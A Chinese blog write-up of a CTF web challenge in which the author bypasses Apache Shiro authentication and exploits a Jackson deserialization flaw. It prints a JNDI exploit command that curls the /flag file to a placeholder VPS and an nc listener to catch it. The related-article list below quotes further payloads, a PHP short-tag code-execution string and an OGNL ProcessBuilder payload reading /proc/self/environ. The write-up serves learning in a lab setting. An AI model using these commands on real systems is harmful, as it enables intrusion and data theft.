[红明谷CTF 2021]JavaWeb

最新推荐文章于 2024-03-22 19:52:34 发布
最新推荐文章于 2024-03-22 19:52:34 发布
阅读量2.3k 收藏 6
点赞数 3
分类专栏: CTF 复现 Java 文章标签: java web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrs_h/article/details/124035038
版权
CTF 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 4 订阅
订阅专栏
Java
1 篇文章 0 订阅
订阅专栏

[红明谷CTF 2021]JavaWeb

一.前言

好像是已经很久不刷题了,因为最近一直在忙着复习高数和专业课,拿不出太多的时间来打CTF。但是这次也总算是找到了点时间,做道java的简单题来放松一下,不能总是学那些书本上的知识了,感觉学多了也会烦。

二.正文

这道题目上来就让我们访问/login目录,所以我们直接访问试试看。
请添加图片描述
服务器那边又让我们访问/json的路径,但是我们如果用post方法对服务器进行访问的话,服务器又会返回另外的结果。
在这里插入图片描述
这里的登陆失败,就表明我们需要进行身份验证,我们尝试输入一对用户名密码。
在这里插入图片描述
还是失败,但是我们在它的Headers里面找到了Cookie
请添加图片描述
我们可以通过这里面的rememberMe=deleteMe,来判断这道题是shiro框架,我们去访问/json
在这里插入图片描述
服务器仍然返回/json,这里就需要用CVE-2020-11989来进行Apache Shiro权限绕过
请添加图片描述
我们发送请求后,服务器端返回给我们了一个报错信息,发现服务器端用到了jackson。可以猜测这里可能会存在反序列化漏洞。
我们用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar这个工具来进行反序列化漏洞利用,并将flag外带。
使用的命令如下

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl [VPS_IP:PORT] -File=@/flag' -A "[VPS_IP]"

在这里插入图片描述
然后我们在新建一个命令窗口,起一个nc来接收flag

nc -lnvp 9999

最后我们用CVE-2019-14439的链子打进去,用上面的springboot的payload
在这里插入图片描述

最后结果
请添加图片描述

后记

很简单的一道题,但是对于我这种刚开始java安全的人来说,还是有很多细节要去学习。

参考文章:
http://b1ue.cn/archives/189.html

入山梵行
关注
专栏目录
[红明谷CTF 2021]write_shell
m0_63045593的博客
04-20 251
[红明谷CTF 2021]write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{
2021红明谷杯数据安全大赛技能场景赛-Writeup
末初的CSDN博客
04-03 7069
文章目录Webwrite_shellhappysqleasytpjavawebMisc签到InputMonitor我的心是冰冰的歪比歪比babytraffic 后续题目知道怎么做了,跟进复现会把wp补上 Web write_shell 第一步主要考察PHP代码执行,第一步先写个phpinfo()看下情况。利用php的一种短标签可以绕过分号,然后拼接一下绕过php字样。 /?action=upload&data=<?=(p.hpinfo)()?> 沙盒路径?action=pwd
Java安全-Java In CTF([红明谷CTF 2021]JavaWeb、[红明谷CTF 2021]JavaWeb
Love&Share
05-05 2395
文章目录[RoarCTF 2019]Easy Java[红明谷CTF 2021]JavaWeb [RoarCTF 2019]Easy Java 存在文件下载,尝试去读 WEB-INF/web.xml,get 传参发现一直失败 在 burp 中改为 post 传参,可以正常下载文件 只要再去读 class 文件即可 成功下载 class 放到 idea 中,拿到 flag [红明谷CTF 2021]JavaWeb 题目提示 /login 目录,访问提示 /json 访问 /json 跳回到 /lo.
[HMGCTF2022]wp
Huamang的博客
03-24 4189
WEB Fan website 首先是一个www.zip的源码泄露,是laminas框架 mvc的框架首先就是看路由 在\module\Album\src\Controller\AlbumController.php里面有功能点 <?php namespace Album\Controller; use Album\Model\AlbumTable; use Laminas\Mvc\Controller\AbstractActionController; use Laminas\View\Mode
2021红明谷杯数据安全大赛技能场景赛 Input Monitor
weixin_45805993的博客
09-25 1634
突然想起这个题… 先用autopsy挂载给的文件 桌面有压缩包和hint 没事,我都删掉了,之前的聊天记录都被我清干净了。除非他们在监控我输入 提示要得到输入记录 用到输入法取证https://mp.weixin.qq.com/s/0p3vbLub5vPKO5Pik9zmUQ 通过对Win10系统自带中文输入法程序运行进程的分析,发现与中文输入法相关的用户词库文件主要存储在 C:\Users\Administrator\AppData\Roaming\Microsoft\InputMethod\Chs
红明谷”杯数据安全大赛 技能场景赛 部分wp
Alanpipi*的博客
04-03 5012
欢迎使用Markdown编辑器 新的改变 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的mermaid语法1 功能; 增加了 多屏幕编辑 Markdown文章功能; 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能,功能按钮位于编辑区域与预览区域中间; 增加了 检查
[红明谷CTF 2021]JavaWeb buu刷题记录
weixin_51458899的博客
04-08 1897
映入眼帘的报错,然后搜一下知道是spring的洞 有个登录,然后提示json,又看到cookie cve-2020-11989 Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) - 腾讯安全玄武实验室 (tencent.com) Apache Shiro权限绕过漏洞分析(CVE-2020-11989) (qq.com) 参考这两篇,得出两种攻击方式 payload1: 双编码绕过 / -> %2f ->%25%32%66 payload2: 分号 使用payl
Java web总结(一)
Momeory的博客
10-08 948
在学习Web应用程序客户端界面设计时,我们已经知道组成一个基本的Web应用程序需要Web服务器、Web客户端浏览器、HTTP协议以及静态HTML文件。        ➣ Web服务器:接收客户端请求,然后向客户端返回一些结果;        ➣ 浏览器:允许用户请求服务器上的某个资源,并且向用户显示请求的结果;        ➣ HTML:告诉用户浏览器怎么向用户显示内容;
CTF题为例,浅学一些JAVAweb项目相关知识
最新发布
Welcome To MakaRi's Blog!
03-22 2094
本文更加偏重于学习题目有关的JAVA知识,而非解题思路,题目的解题与本文讲到的知识点大多无关。但是通过题目学习这些知识可以帮助理解JAVAweb服务和数据库连接的实现,知道了JAVA如何启动服务以及如何连接数据库,这是以后进行JAVA安全学习的前提和基础。本人大一,比较菜且基础薄弱,如有错误还望大佬指点。
ctfshow web入门(java)
Blazing-Angel的博客
07-19 872
ctfshow
ctfweb小白必备JavaScip知识
qq_48511129的博客
02-03 417
JavaScript的代码嵌入在HTML里,直接在客户端的浏览器上执行,属于前端语言。 大多数的xss代码都是使用JavaScript语言编写的。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>javascipt</title> </head> <body> <script>
CTFSHOW web入门 java反序列化篇(更新中)
羽的博客
12-07 5052
ctfshow web入门 java反序列化篇
ctfshow java
SopRomeo的博客
01-27 1104
web279 这个编号有点奇怪,搜搜 漏洞讲解 里面有payload直接用,我不知道啥原因echo FLAG flag不出来 因为这是动态靶机,直接看/proc/self/environ %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/proc/self/environ"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.
RoarCTF 2019 Easy Java
weixin_44522540的博客
03-30 318
打开靶场,一个登陆界面,试了万能密码,行不通,点进help查看: 此时url:download,猜测是文件下载漏洞 burp抓包看下: 打开help.docx 哦豁,走远了 补充一下java web的目录结构 敏感目录 (1) /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 (2) /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能
ctfshow web入门 java web279-283
m0_62207170的博客
04-22 530
ctfshow web入门 java web279-283
[RoarCTF 2019] web题-Easy Java
BROTHERYY的博客
07-10 445
复现环境:buuoj.cn 打开环境,最开始用弱口令进去了,还心想比较简单,后来发现错了,然后点击help发现有报错 访问这个地址 tips:WEB-INF知识点 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值